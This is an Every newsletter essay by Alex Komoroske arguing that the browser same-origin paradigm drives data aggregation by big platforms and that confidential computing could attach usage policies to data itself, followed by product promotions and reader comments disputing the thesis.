Every illustration/komoroske.com.

Why Aggregators Ate the Internet

The hidden architectural choice that makes big platforms bigger—and how we could change the rules for AI

13 4

In the most recent episode of AI & I, former Stripe and Google executive Alex Koromoske referenced the “same-origin paradigm”—a security decision made by Netscape engineers in the 1990s that has inadvertently shaped our digital landscape. In today’s Thesis, Alex explains how this choice created the conditions for big tech monopolies by forcing our data into silos, making it nearly impossible to move information between apps without friction. The good news: AI has reached an inflection point such that new technologies could finally break this cycle. Imagine a personal research assistant that understands your note-taking system, a financial tracker customized to your budgeting approach, or a task manager that adapts to your changing work style—read on to learn more.—Kate Lee

Was this newsletter forwarded to you? Sign up to get it in your inbox.


There's a bug in the operating system of the internet. It's why your photos are trapped in Apple’s ecosystem, you can’t easily move your data between apps, and every new app starts from scratch, knowing nothing about you. Most importantly, it's why the AI revolution—for all its promise—risks making big tech companies even bigger instead of putting powerful tools in your hands.

The bug is called the same origin paradigm. It's a historical accident—a quick fix the Netscape browser team implemented one night in the 1990s that somehow became the invisible physics of modern software. Once you understand how it works, you can't unsee it. You start to notice how every frustration with modern technology traces back to this one architectural choice.

I've spent more than a decade as a product manager and strategist at companies like Stripe and Google. I've seen waves of technology promise to change everything—mobile, social, cloud. But there's a pattern: Each wave makes the biggest companies bigger. Every "revolution" reinforces the existing structures instead of empowering us to create new ones. And it all goes back to the same origin paradigm.

Now it's AI's turn.

The good news? For the first time in decades, we might be able to fix it. The tools to transcend the same origin paradigm are already here.

But first, we need to understand what we're dealing with.

A clean computer that stays clean

Thinkers of all sorts need open space to develop their ideas. But if you’re like us, you probably find that your digital spaces are cluttered more often than not, with Screenshots, PDFs, and downloads. Our AI tool Sparkle cleans your computer so you don’t have to. 

The hidden physics of software

Here's how the same origin paradigm works: Every website, every app, is its own universe. The browser treats amazon.com and google.com as completely separate worlds that can never intersect. It’s the same with the Instagram app and the Uber app on your phone. The isolation is absolute—your data in one origin might as well be on Mars as far as other origins are concerned.

This creates what I call the iron triangle of modern software. It's a constraint that binds the hands of system designers—the architects of operating systems and browsers we all depend on. These designers face an impossible choice. They can build systems that support:

  1. Sensitive data (your emails, photos, documents)
  2. Network access (ability to communicate with servers)
  3. Untrusted code (software from developers you don't know)

But they can only enable two at once—never all three. If untrusted code can both access your sensitive data and communicate over the network, it could steal everything and send it anywhere.

So system designers picked safety through isolation. Each app becomes a fortress—secure but solitary. Want to use a cool new photo organization tool? The browser or operating system forces a stark choice: Either trust it completely with your data (sacrificing the "untrusted" part), or keep your data out of it entirely (sacrificing functionality).

Even when you grant an app or website permission only to look at your photos, you're not really saying, "You can use my photos for this specific purpose." You're saying, "I trust whoever controls this origin, now and forever, to do anything they want with my photos, including sending them anywhere." It's an all-or-nothing proposition.

The aggregation ratchet

This architectural decision creates friction every time data needs to move between apps or websites. But friction in digital systems doesn't just slow things down. It fundamentally reshapes where data accumulates.

Think about water flowing down a mountainside. Every obstacle creates resistance, but that resistance doesn't stop the water—it redirects it. Over time, the water carves channels. Those channels, once formed, attract even more water. What starts as a trickle becomes a stream, then a river.

Data follows the same principle.

Consider how you might plan a trip: You've got flights in your email, hotel confirmations in another app, restaurant recommendations in a Google document, your calendar in yet another tool. Every time you need to connect these pieces you have to manually copy, paste, reformat, repeat. So you grant one service (like Google) access to all of this. Suddenly there's no friction. Everything just works. Later, when it comes time to share your trip details with your fellow travelers, you follow the path of least resistance. It’s simply easier to use the service that already knows your preferences, history, and context.

The service with the most data can provide the most value, which attracts more users, which generates more data. Each click of the ratchet makes it harder for new entrants to compete. The big get bigger not because they're necessarily better, but because the physics of the system tilts the playing field in their favor.

This isn't conspiracy or malice. It's emergent behavior from architectural choices. Water flows downhill. Software with the same origin paradigm aggregates around a few dominant platforms.

Why AI changes everything (and nothing)

Enter artificial intelligence. LLMs represent something genuinely new: They make software creation effectively free. A competent developer with AI assistance can build in hours what used to take weeks. An experienced user can create basic tools without writing a line of code.

This enables what we might call "infinite software"—an endless variety of tools tailored to every conceivable need. Why does this matter? Because software has always been constrained by economics. Building an app costs money, so developers only build for large markets. Your specific workflow, your unique needs, your personal system—none of these are worth a product manager's time unless they also happen to be shared by millions of other users.

When the marginal cost of creating software approaches zero, though, everything changes. We could have:

  1. A custom tool for managing your kids' dietary restrictions across multiple family calendars
  2. A personal research assistant that understands your note-taking system
  3. A financial tracker designed around your specific approach to budgeting
  4. A task manager that reshapes itself around your changing work style

Researcher Geoffrey Litt and his co-authors capture this potential beautifully in their recent paper, "Malleable Software in the Age of AI." They envision a world where software is no longer rigid and predetermined but fluid and shapeable—where users become co-creators of their tools rather than passive consumers.

But infinite software distributed through today's app stores doesn't solve our problems—it amplifies them. More apps mean more silos, more places your data gets trapped, and more fragments to orchestrate. As Litt notes, it's like "bringing a talented sous chef to a food court." We have the capability to create personalized software experiences, but we're stuck serving them up in the same old containers.

AI needs context to be useful. An AI that can see your calendar, email, and documents together might actually help you plan your day. One that only sees fragments is just another chatbot spouting generic advice. But our current security model—with policies attached at the app level—makes sharing context an all-or-nothing gamble.

So what happens? What always happens: The path of least resistance is to put all the data in one place.

Think about what we're trading away: Instead of the malleable, personal tools that Litt envisions, we get one-size-fits-all assistants that require us to trust megacorporations with our most intimate data. The same physics that turned social media into a few giant platforms is about to do the same thing to AI.

We only accept this bad trade because it’s all we know. It’s an architectural choice made before many of us were born. But it doesn’t have to be this way—not anymore.

Why now? The foundations for change

For decades, transcending the same origin paradigm would have been impossible. But the technical pieces for a fundamentally different approach are finally emerging.

Modern processor chips from Intel, AMD, and ARM now include something called Confidential Compute—secure enclaves that create regions of memory fully encrypted and protected from everyone, including cloud administrators. These technologies allow workloads that were previously too sensitive for public clouds, and are already securing billions in financial transactions and defense workloads.

These secure enclaves can also do something called remote attestation. They can provide cryptographic proof—not just a promise, but mathematical proof—of exactly what software is running inside them. It's like having a tamper-proof seal that proves the code handling your data is exactly what it claims to be, unmodified and uncompromised.

If you combine these ingredients in just the right way, what this enables, for the first time, are policies attached not to apps but to data itself. Every piece of data could carry its own rules about how it can be used. Your photos might say, "Analyze me locally but never transmit me." Your calendar might allow, "Extract patterns but only share aggregated insights in a way that is provably anonymous." Your emails could permit reading but forbid forwarding. This breaks the iron triangle: Untrusted code can now work with sensitive data and have network access, because the policies themselves—not the app's origin—control what can be done with the data.

The path forward

What would become possible if we could guarantee that data policies were always respected? If code could work with your most sensitive data without the code's creator ever being able to see it? If every app was remotely attestable—verifiably trustworthy regardless of who made it?

These aren't just theoretical questions anymore. The building blocks exist. The real question is whether we'll use them to imagine something genuinely new—a different physics for how software and data interact in the age of AI.

For once, we’re on the brink of a revolution that can deliver on its promises: of tools that feel like extensions of your will, private by default, adapting to your every need—software that works for you, not on you.

The same origin paradigm got us here, but it doesn't have to define where we go next. We built these systems. We can build better ones.


Alex Komoroske is the CEO and cofounder of Common Tools. He was previously the head of corporate strategy at Stripe and a director of product management at Google.

To read more essays like this, subscribe to Every, and follow us on X at @every and on LinkedIn.

We build AI tools for readers like you. Automate repeat writing with Spiral. Organize files automatically with Sparkle. Deliver yourself from email with Cora.

We also do AI training, adoption, and innovation for companies. Work with us to bring AI into your organization.

Get paid for sharing Every with your friends. Join our referral program.


Ideas and Apps to
Thrive in the AI Age

The essential toolkit for those shaping the future

"This might be the best value you
can get from an AI subscription."

- Jay S.

Mail Every Content
AI&I Podcast AI&I Podcast
Cora Cora
Sparkle Sparkle
Spiral Spiral

Join 100,000+ leaders, builders, and innovators

Community members

Already have an account? Sign in

What is included in a subscription?

Daily insights from AI pioneers + early access to powerful AI tools

Pencil Front-row access to the future of AI
Check In-depth reviews of new models on release day
Check Playbooks and guides for putting AI to work
Check Prompts and use cases for builders

Comments

You need to login before you can comment.
Don't have an account? Sign up!
Backofthenapkin about 7 hours ago

🚧 The Bug Beneath the Browser
Reading Alex Komoroske’s sharp post on the same-origin paradigm had me nodding—until the pivot to AMD’s secure enclaves. A solid feature, sure. But a narrow fix to a systemic problem.

The flaw isn’t in the chip. It’s in the model.
What’s broken is how we authorize, move, and trust data online.

Here’s why hardware-bound solutions won’t solve the deeper architecture problem:

🌱 Too Local: CPU fixes assume data lives in one secure zone. But like people, data needs to move, combine, and adapt.
🌾 Weeds in the Garden: Healthy systems allow messy overlap. Ecosystem diversity—not lockdown—is what drives innovation.
🌊 The River Always Wins: A rock can block flow. But real resilience comes from trees, soil, and balance. Nature distributes control—and software should too.

Komoroske nails the true villain: the same-origin paradigm. It traps your data in silos, makes permission binary, and rewards companies that aggregate context at scale. The result? Big gets bigger.

🧩 What we need isn’t tighter perimeters—it’s a system where trust, access, and privacy aren’t locked in a zero-sum game.

That’s why I’m following researchers like Geoffrey Litt, who’s pushing decomposable documents and malleable software. Instead of rigid apps, we get fluid tools that operate on user-owned, user-governed data. You bring the tool to the context, not the other way around.

🔑 The future of AI isn’t in the model or the chip. It’s in the architecture of agency.

Dan Shipper about 6 hours ago

@backofthenapkin this seems very AI generated

Backofthenapkin about 6 hours ago

@danshipper What magic decoder ring are you using? I write with a partner to sharpen for clarity and brevity. Feels like common sense, not a conspiracy. Like your business, clarity is currency. I don’t mind splitting the check with AI.

Oshyan Greene about 6 hours ago

I don't understand how your thesis that Same Origin is responsible for data silos can really be justified. APIs exist, they can have any rules the developers want them to, the auth can work in whatever way is desired/can be developed. People already trust many big companies with their data, with little or no assurance of genuine privacy or confidentiality of data. People tell secrets to AI every day without considering who has access to it and what they might do with it. People take nude pics all the time, put it up on the cloud, and get hacked. These problems aren't solved by Confidential Compute. And as far as permissions and sharing, some people like myself have photos in both Amazon and Google Clouds, our use of them is based on trust of those orgs, the lack of their ability to communicate with one another is *not* a trust issue. Google and Amazon simply have no incentive to provide data interchange in that context. The reason trusting Google with everything works is that they provide services that cover a wide range of common use cases, and they (generally) handle the integration between them internally. Again none of this has to do with Same Origin.

So the reason better data exchange systems haven't been developed before now is not, in my view, a technical one but simply an incentive one in the capitalist market. Companies could have put resources into creating open systems with good permissions models but they have no financial incentive to do so. They still don't, at least not significant ones. Maybe that will change with AI, but I don't see the case being laid out that clearly above.

Federated systems with granular permissions systems already exist, they prove that tech is not the underlying issue. No need for a fancy Confidential Compute implementation, which anyway relies on trust, i.e. I can send my data to a novel 3rd party for some unique service not provided by the larger trusted data silo I use, but I have to have reason to trust that 3rd party, and data security in processing is a small part of that concern at a practical level. As I noted above confidentiality of data at runtime is generally not a concern for the mass market, as evidenced by people's use of social media, and now AI tools. Blockchain implementations likewise exist to solve similar trust issues. Confidential Compute is a red herring for this problem domain, though it obviously solves some important issues for business customers, and others that could actually be important for the AI age as we as consumers have more and more incentive to share ever more sensitive information with AI companies. But again that's a separate issue from Same Origin *and* from data interchange. At least as far as I can see.

Have I misunderstood the entire argument here?